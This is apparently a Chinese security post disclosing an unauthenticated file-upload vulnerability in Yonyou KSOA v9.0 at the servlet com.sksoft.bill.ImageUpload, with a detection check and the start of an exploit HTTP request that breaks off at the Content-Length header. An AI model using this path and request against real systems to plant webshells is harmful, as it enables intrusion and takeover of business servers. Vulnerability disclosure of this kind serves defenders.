声明:本文分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 触发点:com.sksoft.bill.ImageUpload 存在前台文件上传漏洞,攻击者可以在不登陆的情况下上传恶意 Webshell,控制系统权限。影响范围用友时空企业信息融通平台KSOA v9.0危害级别:高漏洞危害漏洞检测/servlet/com.sksoft.bill.ImageUpload返回null即存在漏洞漏洞利用 GET /servlet/com.sksoft.bill.ImageUpload HTTP/1.1Host: IPUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length:
………………………………